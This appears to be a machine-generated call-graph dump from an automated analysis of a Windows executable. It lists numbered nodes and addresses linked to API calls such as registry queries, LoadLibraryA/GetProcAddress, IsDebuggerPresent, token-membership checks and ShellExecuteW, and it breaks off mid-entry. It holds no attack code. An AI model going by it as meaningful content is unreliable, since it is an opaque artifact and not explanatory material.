360f0a 52 API calls 92907->92911 92911->92903 92913 35df46 92912->92913 92914 35dda8 92912->92914 92944 360f0a 52 API calls 92913->92944 92916 35ddc0 92914->92916 92945 34d7f7 92916->92945 92919 346a63 48 API calls 92920 35de1a 92919->92920 92950 35dfb4 92920->92950 92925 3b24c8 92928 35dea4 GetCurrentProcess 92967 35df5f LoadLibraryA GetProcAddress 92928->92967 92929 35debb 92930 35df31 GetSystemInfo 92929->92930 92931 35dee3 92929->92931 92934 35df0e 92930->92934 92961 35e00c 92931->92961 92936 35df21 92934->92936 92937 35df1c FreeLibrary 92934->92937 92936->92907 92937->92936 92938 35df29 GetSystemInfo 92941 35df03 92938->92941 92939 35def9 92964 35dff4 92939->92964 92941->92934 92943 35df09 FreeLibrary 92941->92943 92943->92934 92944->92914 92946 35f4ea 48 API calls 92945->92946 92947 34d818 92946->92947 92948 35f4ea 48 API calls 92947->92948 92949 34d826 GetVersionExW 92948->92949 92949->92919 92951 35dfbd 92950->92951 92952 34b18b 48 API calls 92951->92952 92953 35de22 92952->92953 92954 346571 92953->92954 92955 34657f 92954->92955 92956 34b18b 48 API calls 92955->92956 92957 34658f 92956->92957 92957->92925 92958 35df77 92957->92958 92968 35df89 92958->92968 92972 35e01e 92961->92972 92965 35e00c 2 API calls 92964->92965 92966 35df01 GetNativeSystemInfo 92965->92966 92966->92941 92967->92929 92969 35dea0 92968->92969 92970 35df92 LoadLibraryA 92968->92970 92969->92928 92969->92929 92970->92969 92971 35dfa3 GetProcAddress 92970->92971 92971->92969 92973 35def1 92972->92973 92974 35e027 LoadLibraryA 92972->92974 92973->92938 92973->92939 92974->92973 92975 35e038 GetProcAddress 92974->92975 92975->92973 92976 3b19ba 92981 35c75a 92976->92981 92980 3b19c9 92982 34d7f7 48 API calls 92981->92982 92983 35c7c8 92982->92983 92989 35d26c 92983->92989 92985 35c865 92987 35c881 92985->92987 92992 35d1fa 48 API calls 92985->92992 92988 360f0a 52 API calls 92987->92988 92988->92980 92993 35d298 92989->92993 92992->92985 92994 35d28b 92993->92994 92995 35d2a5 92993->92995 92994->92985 92995->92994 92996 35d2ac RegOpenKeyExW 92995->92996 92996->92994 92997 35d2c6 RegQueryValueExW 92996->92997 92998 35d2fc RegCloseKey 92997->92998 92999 35d2e7 92997->92999 92998->92994 92999->92998 93000 3b8eb8 93004 38a635 93000->93004 93002 3b8ec3 93003 38a635 84 API calls 93002->93003 93003->93002 93005 38a642 93004->93005 93011 38a66f 93004->93011 93006 38a671 93005->93006 93008 38a676 93005->93008 93005->93011 93013 38a669 93005->93013 93045 35ec4e 81 API calls 93006->93045 93015 34936c 93008->93015 93010 38a67d 93035 34510d 93010->93035 93011->93002 93044 354525 61 API calls 93013->93044 93016 349384 93015->93016 93033 349380 93015->93033 93017 3b4bbf 93016->93017 93018 349398 93016->93018 93022 3b4cbd 93016->93022 93028 3493b0 93016->93028 93019 3b4bc8 93017->93019 93020 3b4ca5 93017->93020 93046 36172b 80 API calls 93018->93046 93026 3b4be7 93019->93026 93019->93028 93053 36172b 80 API calls 93020->93053 93022->93022 93024 35f4ea 48 API calls 93025 3493ba 93024->93025 93025->93033 93047 34ce19 93025->93047 93027 35f4ea 48 API calls 93026->93027 93030 3b4c04 93027->93030 93028->93024 93031 35f4ea 48 API calls 93030->93031 93032 3b4c2a 93031->93032 93032->93033 93034 34ce19 48 API calls 93032->93034 93033->93010 93034->93033 93036 34511f 93035->93036 93037 3b1be7 93035->93037 93054 34b384 93036->93054 93063 37a58f 48 API calls 93037->93063 93040 34512b 93040->93011 93041 3b1bf1 93064 346eed 93041->93064 93043 3b1bf9 93044->93011 93045->93008 93046->93028 93048 34ce28 93047->93048 93049 35ee75 48 API calls 93048->93049 93050 34ce50 93049->93050 93051 35f4ea 48 API calls 93050->93051 93052 34ce66 93051->93052 93052->93033 93053->93028 93055 34b392 93054->93055 93062 34b3c5 93054->93062 93056 34b3fd 93055->93056 93057 34b3b8 93055->93057 93055->93062 93059 35f4ea 48 API calls 93056->93059 93068 34bb85 93057->93068 93060 34b407 93059->93060 93061 35f4ea 48 API calls 93060->93061 93061->93062 93062->93040 93063->93041 93065 346f00 93064->93065 93066 346ef8 93064->93066 93065->93043 93073 34dd47 48 API calls 93066->93073 93069 34bb9b 93068->93069 93072 34bb96 93068->93072 93070 3b1b77 93069->93070 93071 35ee75 48 API calls 93069->93071 93071->93072 93072->93062 93073->93065 93074 3bb31e GetTempPathW 93075 3bb33b 93074->93075 93076 3b19dd 93081 344a30 93076->93081 93078 3b19f1 93101 360f0a 52 API calls 93078->93101 93080 3b19fb 93082 344a40 93081->93082 93083 34d7f7 48 API calls 93082->93083 93084 344af6 93083->93084 93102 345374 93084->93102 93086 344aff 93109 34363c 93086->93109 93093 34d7f7 48 API calls 93094 344b32 93093->93094 93131 3449fb 93094->93131 93096 344b43 93096->93078 93097 34ce19 48 API calls 93099 344b3d 93097->93099 93098 3464cf 48 API calls 93098->93099 93099->93096 93099->93097 93099->93098 93100 3461a6 48 API calls 93099->93100 93100->93099 93101->93080 93145 36f8a0 93102->93145 93105 34ce19 48 API calls 93106 3453a7 93105->93106 93147 34660f 93106->93147 93108 3453b1 93108->93086 93110 343649 93109->93110 93154 34366c GetFullPathNameW 93110->93154 93112 34365a 93113 346a63 48 API calls 93112->93113 93114 343669 93113->93114 93115 34518c 93114->93115 93116 345197 93115->93116 93117 3b1ace 93116->93117 93118 34519f 93116->93118 93120 346b4a 48 API calls 93117->93120 93156 345130 93118->93156 93122 3b1adb 93120->93122 93121 344b18 93125 3464cf 93121->93125 93123 35ee75 48 API calls 93122->93123 93124 3b1b07 93123->93124 93126 34651b 93125->93126 93130 3464dd 93125->93130 93128 35f4ea 48 API calls 93126->93128 93127 35f4ea 48 API calls 93129 344b29 93127->93129 93128->93130 93129->93093 93130->93127 93166 34bcce 93131->93166 93134 3b41cc RegQueryValueExW 93136 3b4246 RegCloseKey 93134->93136 93137 3b41e5 93134->93137 93135 344a2b 93135->93099 93138 35f4ea 48 API calls 93137->93138 93139 3b41fe 93138->93139 93172 3447b7 93139->93172 93142 3b423b 93142->93136 93143 3b4224 93144 346a63 48 API calls 93143->93144 93144->93142 93146 345381 GetModuleFileNameW 93145->93146 93146->93105 93148 36f8a0 93147->93148 93149 34661c GetFullPathNameW 93148->93149 93150 346a63 48 API calls 93149->93150 93151 346643 93150->93151 93152 346571 48 API calls 93151->93152 93153 34664f 93152->93153 93153->93108 93155 34368a 93154->93155 93155->93112 93157 34513f 93156->93157 93158 345151 93157->93158 93159 3b1b27 93157->93159 93160 34bb85 48 API calls 93158->93160 93161 346b4a 48 API calls 93159->93161 93163 34515e 93160->93163 93162 3b1b34 93161->93162 93164 35ee75 48 API calls 93162->93164 93163->93121 93165 3b1b57 93164->93165 93167 34bce8 93166->93167 93171 344a0a RegOpenKeyExW 93166->93171 93168 35f4ea 48 API calls 93167->93168 93169 34bcf2 93168->93169 93170 35ee75 48 API calls 93169->93170 93170->93171 93171->93134 93171->93135 93173 35f4ea 48 API calls 93172->93173 93174 3447c9 RegQueryValueExW 93173->93174 93174->93142 93174->93143 93175 365dfd 93176 365e09 93175->93176 93212 367eeb GetStartupInfoW 93176->93212 93179 365e0e 93214 369ca7 GetProcessHeap 93179->93214 93180 365e66 93181 365e71 93180->93181 93299 365f4d 47 API calls 93180->93299 93215 367b47 93181->93215 93184 365e77 93185 365e82 93184->93185 93300 365f4d 47 API calls 93184->93300 93236 36acb3 93185->93236 93188 365e91 93189 365e9d GetCommandLineW 93188->93189 93301 365f4d 47 API calls 93188->93301 93255 372e7d GetEnvironmentStringsW 93189->93255 93192 365e9c 93192->93189 93196 365ec2 93268 372cb4 93196->93268 93199 365ec8 93200 365ed3 93199->93200 93303 36115b 47 API calls 93199->93303 93282 361195 93200->93282 93203 365edb 93204 365ee6 93203->93204 93304 36115b 47 API calls 93203->93304 93286 343a0f 93204->93286 93207 365efa 93208 365f09 93207->93208 93305 3613f1 47 API calls 93207->93305 93306 361186 47 API calls 93208->93306 93211 365f0e 93213 367f01 93212->93213 93213->93179 93214->93180 93307 36123a 30 API calls 93215->93307 93217 367b4c 93308 367e23 InitializeCriticalSectionAndSpinCount 93217->93308 93219 367b51 93220 367b55 93219->93220 93310 367e6d TlsAlloc 93219->93310 93309 367bbd 50 API calls 93220->93309 93223 367b5a 93223->93184 93224 367b67 93224->93220 93225 367b72 93224->93225 93311 366986 93225->93311 93228 367bb4 93319 367bbd 50 API calls 93228->93319 93231 367bb9 93231->93184 93232 367b93 93232->93228 93233 367b99 93232->93233 93318 367a94 47 API calls 93233->93318 93235 367ba1 GetCurrentThreadId 93235->93184 93237 36acbf 93236->93237 93328 367cf4 93237->93328 93239 36acc6 93240 366986 47 API calls 93239->93240 93242 36acd7 93240->93242 93241 36ad42 GetStartupInfoW 93250 36ae80 93241->93250 93252 36ad57 93241->93252 93242->93241 93243 36ace2 93242->93243 93243->93188 93244 36af44 93335 36af58 LeaveCriticalSection 93244->93335 93246 36aec9 GetStdHandle 93246->93250 93247 366986 47 API calls 93247->93252 93248 36aedb GetFileType 93248->93250 93249 36ada5 93249->93250 93253 36add7 GetFileType 93249->93253 93254 36ade5 InitializeCriticalSectionAndSpinCount 93249->93254 93250->93244 93250->93246 93250->93248 93251 36af08 InitializeCriticalSectionAndSpinCount 93250->93251 93251->93250 93252->93247 93252->93249 93252->93250 93253->93249 93253->93254 93254->93249 93256 365ead 93255->93256 93257 372e8e 93255->93257 93262 372a7b GetModuleFileNameW 93256->93262 93374 3669d0 47 API calls 93257->93374 93260 372eb4 93261 372eca FreeEnvironmentStringsW 93260->93261 93261->93256 93263 372aaf 93262->93263 93264 365eb7 93263->93264 93265 372ae9 93263->93265 93264->93196 93302 36115b 47 API calls 93264->93302 93375 3669d0 47 API calls 93265->93375 93267 372aef 93267->93264 93269 372ccd 93268->93269 93273 372cc5 93268->93273 93270 366986 47 API calls 93269->93270 93278 372cf6 93270->93278 93271 372d4d 93272 361c9d 47 API calls 93271->93272 93272->93273 93273->93199 93274 366986 47 API calls 93274->93278 93275 372d72 93276 361c9d 47 API calls 93275->93276 93276->93273 93278->93271 93278->93273 93278->93274 93278->93275 93279 372d89 93278->93279 93376 372567 47 API calls 93278->93376 93377 366e20 IsProcessorFeaturePresent 93279->93377 93281 372d95 93281->93199 93283 3611a1 93282->93283 93285 3611e0 93283->93285 93400 360f0a 52 API calls 93283->93400 93285->93203 93287 3b1ebf 93286->93287 93288 343a29 93286->93288 93289 343a63 IsThemeActive 93288->93289 93401 361405 93289->93401 93293 343a8f 93413 343adb SystemParametersInfoW SystemParametersInfoW 93293->93413 93295 343a9b 93414 343d19 93295->93414 93297 343aa3 SystemParametersInfoW 93298 343ac8 93297->93298 93298->93207 93299->93181 93300->93185 93301->93192 93305->93208 93306->93211 93307->93217 93308->93219 93309->93223 93310->93224 93313 36698d 93311->93313 93314 3669ca 93313->93314 93315 3669ab Sleep 93313->93315 93320 3730aa 93313->93320 93314->93228 93317 367ec9 TlsSetValue 93314->93317 93316 3669c2 93315->93316 93316->93313 93316->93314 93317->93232 93318->93235 93319->93231 93321 3730b5 93320->93321 93326 3730d0 93320->93326 93322 3730c1 93321->93322 93321->93326 93327 367c0e 47 API calls 93322->93327 93324 3730e0 HeapAlloc 93325 3730c6 93324->93325 93324->93326 93325->93313 93326->93324 93326->93325 93327->93325 93329 367d05 93328->93329 93330 367d18 EnterCriticalSection 93328->93330 93336 367d7c 93329->93336 93330->93239 93332 367d0b 93332->93330 93360 36115b 47 API calls 93332->93360 93335->93243 93337 367d88 93336->93337 93338 367d91 93337->93338 93339 367da9 93337->93339 93361 3681c2 47 API calls 93338->93361 93341 367da7 93339->93341 93347 367e11 93339->93347 93341->93339 93364 3669d0 47 API calls 93341->93364 93342 367d96 93362 36821f 47 API calls 93342->93362 93345 367dbd 93348 367dc4 93345->93348 93349 367dd3 93345->93349 93346 367d9d 93363 361145 GetModuleHandleExW GetProcAddress ExitProcess 93346->93363 93347->93332 93365 367c0e 47 API calls 93348->93365 93350 367cf4 46 API calls 93349->93350 93353 367dda 93350->93353 93355 367dfe 93353->93355 93356 367de9 InitializeCriticalSectionAndSpinCount 93353->93356 93354 367dc9 93354->93347 93366 361c9d 93355->93366 93357 367e04 93356->93357 93372 367e1a LeaveCriticalSection 93357->93372 93361->93342 93362->93346 93364->93345 93365->93354 93367 361ca6 RtlFreeHeap 93366->93367 93371 361ccf 93366->93371 93368 361cbb 93367->93368 93367->93371 93373 367c0e 47 API calls 93368->93373 93370 361cc1 GetLastError 93370->93371 93371->93357 93372->93347 93373->93370 93374->93260 93375->93267 93376->93278 93378 366e2b 93377->93378 93383 366cb5 93378->93383 93382 366e46 93382->93281 93384 366ccf 93383->93384 93385 366cef IsDebuggerPresent 93384->93385 93391 3681ac SetUnhandledExceptionFilter UnhandledExceptionFilter 93385->93391 93388 366dd6 93390 368197 GetCurrentProcess TerminateProcess 93388->93390 93389 366db3 93392 36a70c 93389->93392 93390->93382 93391->93389 93393 36a716 IsProcessorFeaturePresent 93392->93393 93394 36a714 93392->93394 93396 3737b0 93393->93396 93394->93388 93399 37375f GetCurrentProcess TerminateProcess SetUnhandledExceptionFilter UnhandledExceptionFilter IsDebuggerPresent 93396->93399 93398 373893 93398->93388 93399->93398 93400->93285 93402 367cf4 47 API calls 93401->93402 93403 361410 93402->93403 93466 367e58 LeaveCriticalSection 93403->93466 93405 343a88 93406 36146d 93405->93406 93407 361477 93406->93407 93408 361491 93406->93408 93407->93408 93467 367c0e 47 API calls 93407->93467 93408->93293 93410 361481 93468 366e10 8 API calls 93410->93468 93412 36148c 93412->93293 93413->93295 93415 343d26 93414->93415 93416 34d7f7 48 API calls 93415->93416 93417 343d31 GetCurrentDirectoryW 93416->93417 93469 3461ca 93417->93469 93419 343d57 IsDebuggerPresent 93420 343d65 93419->93420 93421 3b1cc1 MessageBoxA 93419->93421 93423 3b1cd9 93420->93423 93424 343d82 93420->93424 93453 343e3a 93420->93453 93421->93423 93422 343e41 SetCurrentDirectoryW 93425 343e4e 93422->93425 93655 35c682 48 API calls 93423->93655 93543 3440e5 93424->93543 93425->93297 93429 343da0 GetFullPathNameW 93431 346a63 48 API calls 93429->93431 93430 3b1ce9 93434 3b1cff SetCurrentDirectoryW 93430->93434 93432 343ddb 93431->93432 93559 346430 93432->93559 93434->93425 93436 343df6 93437 343e00 93436->93437 93656 3871fa AllocateAndInitializeSid CheckTokenMembership FreeSid 93436->93656 93575 343e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 93437->93575 93440 3b1d1c 93440->93437 93443 3b1d2d 93440->93443 93445 345374 50 API calls 93443->93445 93444 343e0a 93446 343e1f 93444->93446 93583 344ffc 93444->93583 93447 3b1d35 93445->93447 93593 34e8d0 93446->93593 93450 34ce19 48 API calls 93447->93450 93452 3b1d42 93450->93452 93454 3b1d49 93452->93454 93455 3b1d6e 93452->93455 93453->93422 93458 34518c 48 API calls 93454->93458 93457 34518c 48 API calls 93455->93457 93459 3b1d6a GetForegroundWindow ShellExecuteW 93457->93459 93460 3b1d54 93458->93460 93463 3b1d9e 93459->93463 93462 34510d 48 API calls 93460->93462 93464 3b1d61 93462->93464 93463->93453 93465 34518c 48 API calls 93464->93465 93465->93459 93466->93405 93467->93410 93468->93412 93657 35e99b 93469->93657 93473 3461eb 93474 345374 50 API calls 93473->93474 93475 3461ff 93474->93475 93476 34ce19 48 API calls 93475->93476 93477 34620c 93476->93477 93674 3439db 93477->93674 93479 346216 93480 346eed 48 API calls 93479->93480 93481 34622b 93480->93481 93686 349048 93481->93686 93484 34ce19 48 API calls 93485 346244 93484->93485 93486 34d6e9 55 API calls 93485->93486 93487 346254 93486->93487 93488 34ce19 48 API calls 93487->93488 93489 34627c 93488->93489 93490 34d6e9 55 API calls 93489->93490 93491 34628f 93490->93491 93492 34ce19 48 API calls 93491->93492 93493 3462a0 93492->93493 93689 34d645 93493->93689 93495 3462b2 93496 34d7f7 48 API calls 93495->93496 93497 3462c5 93496->93497 93699 3463fc 93497->93699 93501 3462df 93502 3b1c08 93501->93502 93503 3462e9 93501->93503 93504 3463fc 48 API calls 93502->93504 93505 360fa7 59 API calls 93503->93505 93507 3b1c1c 93504->93507 93506 3462f4 93505->93506 93506->93507 93508 3462fe 93506->93508 93510 3463fc 48 API calls 93507->93510 93509 360fa7 59 API calls 93508->93509 93511 346309 93509->93511 93512 3b1c38 93510->93512 93511->93512 93513 346313 93511->93513 93515 345374 50 API calls 93512->93515 93514 360fa7 59 API calls 93513->93514 93521 34631e 93514->93521 93516 3b1c5d 93515->93516 93517 3463fc 48 API calls 93516->93517 93519 3b1c69 93517->93519 93518 34635f 93520 3b1c86 93518->93520 93522 34636c 93518->93522 93523 346eed 48 API calls 93519->93523 93525 346eed 48 API calls 93520->93525 93521->93518 93521->93520 93524 3463fc 48 API calls 93521->93524 93526 35c050 48 API calls 93522->93526 93527 3b1c77 93523->93527 93528 346342 93524->93528 93529 3b1ca8 93525->93529 93530 346384 93526->93530 93531 3463fc 48 API calls 93527->93531 93532 346eed 48 API calls 93528->93532 93533 3463fc 48 API calls 93529->93533 93715 351b90 93530->93715 93531->93520 93535 346350 93532->93535 93536 3b1cb5 93533->93536 93537 3463fc 48 API calls 93535->93537 93536->93536 93537->93518 93538 351b90 48 API calls 93540 346394 93538->93540 93540->93538 93541 3463fc 48 API calls 93540->93541 93542 3463d6 93540->93542 93731 346b68 48 API calls 93540->93731 93541->93540 93542->93419 93544 3440f2 93543->93544 93545 3b370e 93544->93545 93546 34410b 93544->93546 93549 3b372a GetOpenFileNameW 93545->93549 93547 34660f 49 API calls 93546->93547 93548 344114 93547->93548 94368 3440a7 93548->94368 93551 3b3779 93549->93551 93553 346a63 48 API calls 93551->93553 93555 3b378e 93553->93555 93555->93555 93556 344129 94386 344139 93556->94386 93560 34643d 93559->93560 94596 344c75 93560->94596 93562 346442 93574 343dee 93562->93574 94607 345928 86 API calls 93562->94607 93564 34644f 93564->93574 94608 345798 88 API calls 93564->94608 93566 346458 93567 34645c GetFullPathNameW 93566->93567 93566->93574 93568 346a63 48 API calls 93567->93568 93569 346488 93568->93569 93570 346a63 48 API calls 93569->93570 93571 346495 93570->93571 93572 3b5dcf 93571->93572 93573 346a63 48 API calls 93571->93573 93573->93574 93574->93430 93574->93436 93576 3b1cba 93575->93576 93577 343ed8 93575->93577 94650 344024 93577->94650 93581 343e05 93582 3436b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 93581->93582 93582->93444 93584 345027 93583->93584 94655 344c30 93584->94655 93587 3450ac 93589 3b3d28 Shell_NotifyIconW 93587->93589 93590 3450ca Shell_NotifyIconW 93587->93590 94659 3451af 93590->94659 93592 3450df 93592->93446 93594 34e8f6 93593->93594 93626 34e906 93593->93626 93595 34ed52 93594->93595 93594->93626 94843 35e3cd 331 API calls 93595->94843 93597 34ebc7 93598 343e2a 93597->93598 94844 342ff6 16 API calls 93597->94844 93598->93453 93654 343847 Shell_NotifyIconW 93598->93654 93600 34ed63 93600->93598 93602 34ed70 93600->93602 93601 34e94c PeekMessageW 93601->93626 94845 35e312 331 API calls 93602->94845 93604 3b526e Sleep 93604->93626 93605 34ed77 LockWindowUpdate DestroyWindow GetMessageW 93605->93598 93611 34ed21 PeekMessageW 93611->93626 93612 35f4ea 48 API calls 93612->93626 93613 34ebf7 timeGetTime 93613->93626 93615 346eed 48 API calls 93615->93626 93616 34ed3a TranslateMessage DispatchMessageW 93616->93611 93617 3b5557 WaitForSingleObject 93621 3b5574 GetExitCodeProcess CloseHandle 93617->93621 93617->93626 93618 34d7f7 48 API calls 93639 3b5429 93618->93639 93619 342aae 307 API calls 93619->93626 93620 3b588f Sleep 93620->93639 93621->93626 93622 34edae timeGetTime 94846 341caa 49 API calls 93622->94846 93625 3b5733 Sleep 93625->93639 93626->93597 93626->93601 93626->93604 93626->93611 93626->93612 93626->93613 93626->93615 93626->93616 93626->93617 93626->93619 93626->93620 93626->93622 93626->93625 93633 3b5445 Sleep 93626->93633 93626->93639 93640 341caa 49 API calls 93626->93640 93650 38cc5c 86 API calls 93626->93650 93652 34ce19 48 API calls 93626->93652 93653 34d6e9 55 API calls 93626->93653 94682 34ef00 93626->94682 94687 34f110 93626->94687 94752 3545e0 93626->94752 94768 34eed0 331 API calls 93626->94768 94769 353200 93626->94769 94841 35e244 TranslateAcceleratorW 93626->94841 94842 35dc5f IsDialogMessageW GetClassLongW 93626->94842 94847 3a8d23 48 API calls 93626->94847 94851 34fe30 93626->94851 93629 35dc38 timeGetTime 93629->93639 93630 3b5926 GetExitCodeProcess 93631 3b593c WaitForSingleObject 93630->93631 93632 3b5952 CloseHandle 93630->93632 93631->93626 93631->93632 93632->93639 93633->93626 93635 342c79 107 API calls 93635->93639 93636 3b5432 Sleep 93636->93633 93637 3a8c4b 108 API calls 93637->93639 93638 3b59ae Sleep 93638->93626 93639->93618 93639->93626 93639->93629 93639->93630 93639->93633 93639->93635 93639->93636 93639->93637 93639->93638 93641 34ce19 48 API calls 93639->93641 93646 34d6e9 55 API calls 93639->93646 94848 384cbe 49 API calls 93639->94848 94849 341caa 49 API calls 93639->94849 94850 342aae 331 API calls 93639->94850 94880 39ccb2 50 API calls 93639->94880 94881 387a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 93639->94881 94882 386532 63 API calls 93639->94882 93640->93626 93641->93639 93646->93639 93650->93626 93652->93626 93653->93626 93654->93453 93655->93430 93656->93440 93658 34d7f7 48 API calls 93657->93658 93659 3461db 93658->93659 93660 346009 93659->93660 93661 346016 93660->93661 93662 346a63 48 API calls 93661->93662 93672 34617c 93661->93672 93664 346048 93662->93664 93673 34607e 93664->93673 93732 3461a6 93664->93732 93665 3461a6 48 API calls 93665->93673 93666 34614f 93667 34ce19 48 API calls 93666->93667 93666->93672 93669 346170 93667->93669 93668 34ce19 48 API calls 93668->93673 93670 3464cf 48 API calls 93669->93670 93670->93672 93671 3464cf 48 API calls 93671->93673 93672->93473 93673->93665 93673->93666 93673->93668 93673->93671 93673->93672 93735 3441a9 93674->93735 93677 343a06 93677->93479 93680 361c9d 47 API calls 93682 3b2ffd 93680->93682 93684 344252 84 API calls 93682->93684 93683 3b2ff0 93683->93680 93685 3b3006 93684->93685 93685->93685 93687 35f4ea 48 API calls 93686->93687 93688 346237 93687->93688 93688->93484 93690 34d654 93689->93690 93697 34d67e 93689->93697 93691 34d6c2 93690->93691 93692 34d65b 93690->93692 93698 34d6ab 93691->93698 94362 35dce0 53 API calls 93691->94362 93693 34d666 93692->93693 93692->93698 94360 34d9a0 53 API calls 93693->94360 93697->93495 93698->93697 94361 35dce0 53 API calls 93698->94361 93700 346406 93699->93700 93701 34641f 93699->93701 93703 346eed 48 API calls 93700->93703 93702 346a63 48 API calls 93701->93702 93704 3462d1 93702->93704 93703->93704 93705 360fa7 93704->93705 93706 360fb3 93705->93706 93707 361028 93705->93707 93714 360fd8 93706->93714 94363 367c0e 47 API calls 93706->94363 94365 36103a 59 API calls 93707->94365 93710 361035 93710->93501 93711 360fbf 94364 366e10 8 API calls 93711->94364 93713 360fca 93713->93501 93714->93501 93716 351cf6 93715->93716 93718 351ba2 93715->93718 93716->93540 93717 351bae 93723 351bb9 93717->93723 94367 35c15c 48 API calls 93717->94367 93718->93717 93720 35f4ea 48 API calls 93718->93720 93721 3b49c4 93720->93721 93724 35f4ea 48 API calls 93721->93724 93722 351c5d 93722->93540 93723->93722 93725 35f4ea 48 API calls 93723->93725 93730 3b49cf 93724->93730 93726 351c9f 93725->93726 93727 351cb2 93726->93727 94366 342925 48 API calls 93726->94366 93727->93540 93729 35f4ea 48 API calls 93729->93730 93730->93717 93730->93729 93731->93540 93733 34bdfa 48 API calls 93732->93733 93734 3461b1 93733->93734 93734->93664 93800 344214 93735->93800 93740 3441d4 LoadLibraryExW 93810 344291 93740->93810 93741 3b4f73 93742 344252 84 API calls 93741->93742 93744 3b4f7a 93742->93744 93746 344291 3 API calls 93744->93746 93749 3b4f82 93746->93749 93748 3441fb 93748->93749 93750 344207 93748->93750 93836 3444ed 93749->93836 93751 344252 84 API calls 93750->93751 93753 3439fe 93751->93753 93753->93677 93759 38c396 93753->93759 93756 3b4fa9 93844 344950 93756->93844 93758 3b4fb6 93760 344517 83 API calls 93759->93760 93761 38c405 93760->93761 94137 38c56d 93761->94137 93764 3444ed 64 API calls 93765 38c432 93764->93765 93766 3444ed 64 API calls 93765->93766 93767 38c442 93766->93767 93768 3444ed 64 API calls 93767->93768 93769 38c45d 93768->93769 93770 3444ed 64 API calls 93769->93770 93771 38c478 93770->93771 93772 344517 83 API calls 93771->93772 93773 38c48f 93772->93773 93774 36395c 47 API calls 93773->93774 93775 38c496 93774->93775 93776 36395c 47 API calls 93775->93776 93777 38c4a0 93776->93777 93778 3444ed 64 API calls 93777->93778 93779 38c4b4 93778->93779 93780 38bf5a GetSystemTimeAsFileTime 93779->93780 93781 38c4c7 93780->93781 93782 38c4dc 93781->93782 93783 38c4f1 93781->93783 93786 361c9d 47 API calls 93782->93786 93784 38c556 93783->93784 93785 38c4f7 93783->93785 93788 361c9d 47 API calls 93784->93788 94143 38b965 93785->94143 93789 38c4e2 93786->93789 93792 38c41b 93788->93792 93791 361c9d 47 API calls 93789->93791 93791->93792 93792->93683 93794 344252 93792->93794 93793 361c9d 47 API calls 93793->93792 93795 344263 93794->93795 93796 34425c 93794->93796 93798 344272 93795->93798 93799 344283 FreeLibrary 93795->93799 93797 3635e4 83 API calls 93796->93797 93797->93795 93798->93683 93799->93798 93849 344339 93800->93849 93804 344244 FreeLibrary 93805 3441bb 93804->93805 93807 363499 93805->93807 93806 34423c 93806->93804 93806->93805 93857 3634ae 93807->93857 93809 3441c8 93809->93740 93809->93741 93936 3442e4 93810->93936 93813 3442b8 93815 3442c1 FreeLibrary 93813->93815 93816 3441ec 93813->93816 93815->93816 93817 344380 93816->93817 93818 35f4ea 48 API calls 93817->93818 93819 344395 93818->93819 93820 3447b7 48 API calls 93819->93820 93821 3443a1 93820->93821 93822 3443dc 93821->93822 93823 3444d1 93821->93823 93824 344499 93821->93824 93825 344950 57 API calls 93822->93825 93955 38c750 93 API calls 93823->93955 93944 34406b CreateStreamOnHGlobal 93824->93944 93829 3443e5 93825->93829 93828 3444ed 64 API calls 93828->93829 93829->93828 93830 344479 93829->93830 93832 3b4ed7 93829->93832 93950 344517 93829->93950 93830->93748 93833 344517 83 API calls 93832->93833 93834 3b4eeb 93833->93834 93835 3444ed 64 API calls 93834->93835 93835->93830 93837 3444ff 93836->93837 93840 3b4fc0 93836->93840 93979 36381e 93837->93979 93841 38bf5a 94114 38bdb4 93841->94114 93843 38bf70 93843->93756 93845 3b5002 93844->93845 93846 34495f 93844->93846 94119 363e65 93846->94119 93848 344967 93848->93758 93853 34434b 93849->93853 93852 344321 LoadLibraryA GetProcAddress 93852->93806 93854 34422f 93853->93854 93855 344354 LoadLibraryA 93853->93855 93854->93806 93854->93852 93855->93854 93856 344365 GetProcAddress 93855->93856 93856->93854 93860 3634ba 93857->93860 93858 3634cd 93905 367c0e 47 API calls 93858->93905 93860->93858 93862 3634fe 93860->93862 93861 3634d2 93906 366e10 8 API calls 93861->93906 93876 36e4c8 93862->93876 93865 363503 93866 36350c 93865->93866 93867 363519 93865->93867 93907 367c0e 47 API calls 93866->93907 93869 363543 93867->93869 93870 363523 93867->93870 93890 36e5e0 93869->93890 93908 367c0e 47 API calls 93870->93908 93875 3634dd 93875->93809 93877 36e4d4 93876->93877 93878 367cf4 47 API calls 93877->93878 93879 36e4e2 93878->93879 93880 36e559 93879->93880 93885 367d7c 47 API calls 93879->93885 93888 36e552 93879->93888 93913 364e5b 48 API calls 93879->93913 93914 364ec5 LeaveCriticalSection LeaveCriticalSection 93879->93914 93915 3669d0 47 API calls 93880->93915 93883 36e560 93884 36e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 93883->93884 93883->93888 93884->93888 93885->93879 93887 36e5cc 93887->93865 93910 36e5d7 93888->93910 93891 36e600 93890->93891 93892 36e61a 93891->93892 93904 36e7d5 93891->93904 93922 36185b 59 API calls 93891->93922 93920 367c0e 47 API calls 93892->93920 93894 36e61f 93921 366e10 8 API calls 93894->93921 93896 36e838 93917 3763c9 93896->93917 93898 36354e 93909 363570 LeaveCriticalSection LeaveCriticalSection 93898->93909 93900 36e7ce 93900->93904 93923 36185b 59 API calls 93900->93923 93902 36e7ed 93902->93904 93924 36185b 59 API calls 93902->93924 93904->93892 93904->93896 93905->93861 93906->93875 93907->93875 93908->93875 93909->93875 93916 367e58 LeaveCriticalSection 93910->93916 93912 36e5de 93912->93887 93913->93879 93914->93879 93915->93883 93916->93912 93925 375bb1 93917->93925 93919 3763e2 93919->93898 93920->93894 93921->93898 93922->93900 93923->93902 93924->93904 93928 375bbd 93925->93928 93926 375bcf 93927 367c0e 47 API calls 93926->93927 93929 375bd4 93927->93929 93928->93926 93930 375c06 93928->93930 93931 366e10 8 API calls 93929->93931 93932 375c78 110 API calls 93930->93932 93935 375bde 93931->93935 93933 375c23 93932->93933 93934 375c4c LeaveCriticalSection 93933->93934 93934->93935 93935->93919 93940 3442f6 93936->93940 93939 3442cc LoadLibraryA GetProcAddress 93939->93813 93941 3442aa 93940->93941 93942 3442ff LoadLibraryA 93940->93942 93941->93813 93941->93939 93942->93941 93943 344310 GetProcAddress 93942->93943 93943->93941 93945 344085 FindResourceExW 93944->93945 93946 3440a2 93944->93946 93945->93946 93947 3b4f16 LoadResource 93945->93947 93946->93822 93947->93946 93948 3b4f2b SizeofResource 93947->93948 93948->93946 93949 3b4f3f LockResource 93948->93949 93949->93946 93951 